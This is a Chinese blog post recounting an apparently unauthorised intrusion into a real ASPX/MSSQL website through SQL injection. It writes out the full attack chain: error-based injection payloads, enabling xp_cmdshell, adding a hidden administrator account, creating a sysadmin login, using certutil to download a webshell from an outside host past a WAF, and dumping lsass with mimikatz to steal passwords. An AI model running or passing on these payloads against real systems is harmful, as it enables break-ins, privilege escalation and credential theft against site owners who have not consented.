一次曲折的注入

  之前写了好多的实战文章,由于敏感都在本地记录了,等网站漏洞修复完成之后慢慢的分享一些思路和技巧。本文首发于tools,然后在博客转载。一次偶然发现了一处注入,apsx注入,之前练得少,决定试一试看看,先sqlmap跑一波。
1.png
1.png
  500报错,可能跑不出来,于是试试手工,sqlmap被拦了,但是手工很顺利,可能是加了sqlmap的指纹了吧;
1.png
判断版本’ or @@version>0 –
1.png

1
2
计算机名 ' or @@SERVERNAME>0 --
爆当前数据库名 ' or db_name()>0 --

  网站没有找见后台,想着跑出来密码也没有登录地方,于是那些查找数据库、表名、字段名就直接略过,跑出来也登不进去。先看看其他网站,于是先跑一下二级域名以及旁站,bing查询确实很棒,可以查出好多旁站,极力推荐;
  发现三处旁站,一个php的、一个oa还有一个致远协同,没有可以利用的地方,还是先看看注入吧;
先看注入, 当前用户 ‘ or user_name()>0 –
2.png
判断是否支持多句查询’;declare @s int;–
3.png
查看一下xp_cmdshell是否开启
4.png
首先开启一下xp_cmdshell

1
';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

  显示登录成功,则是命令执行成功,成功开启xp_cmdshell,然后可以执行命令了,但是执行命令没有回显,正常现象;直接添加用户,显示执行成功,但是没有用户添加上,郁闷,之后才发现是火绒的问题。

1
2
';exec master..xp_cmdshell 'net user web$ Web123!@# /add';--
';exec master..xp_cmdshell 'net localgroup administrators web$ /add';--

执行cmd获取回显:

1
2
3
4
';create table temp(id int identity(1,1),a varchar(8000));-- 创建一个表
';insert into temp exec master.dbo.xp_cmdshell 'whoami'; -- 执行cmd指令并且插入到表中
' and (select substring((select a from temp for xml auto),1,8000))>0;-- 可以一次得到所有的结果
';drop table temp;-- 删除表

5.png
6.png
目标显示开启了1433,3389,3306端口,于是可以添加sa用户然后远程连接,增加sa用户:

1
2
';exec master.dbo.sp_addlogin test,password;--
';exec master.dbo.sp_addsrvrolemember test,sysadmin;--

可以直接连接,方便好多,比刚才执行命令舒服了好多;
7.png
  完美,可以直接执行命令,美滋滋。CS或者Msf直接撸之,但是没有vps就很心疼啊,只能找个shell远程下载了。发现旁站php的配置文件,然后还有phpmyadmin,这里有几个思路拿shell:

1
2
3
直接远程下载到web路径;
旁站phpmyadmin后台拿shell;
旁站登录后台拿shell;

第一个:
  直接下载,然后,或者直接下载wce或者procdump.exe直接读取管理员密码然后登录,美滋滋。

1
2
certutil.exe -urlcache -split -f http://xxx/uploads/conf1g.txt conf1g.php
move conf1g.php E:\xxxxx\ 失败

  直接500报错,看来是有waf,难怪slamp一直跑不出来,直接换个过狗的吧
8.png
9.png
10.png
第二个:
  phpmyadmin后台登录几种建表方式没有成功,然后日志写shell也没有成功
11.png
12.png
第三种
  php站进入后台拿shell,密码还没有解开,暂时无法登录拿shell

  还是用第一种方法吧,最近发布的冰蝎管理shell,免杀还是不错的,大马带小马,可以简单操作了
13.png
抓hash
wce 失败
Procdump导出,使用mimikatz

1
2
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonPasswords full

14.png
成功拿到密码登录,直接登录之,之后就不截图了,进去之后发现已经有人光顾过了,有点厉害。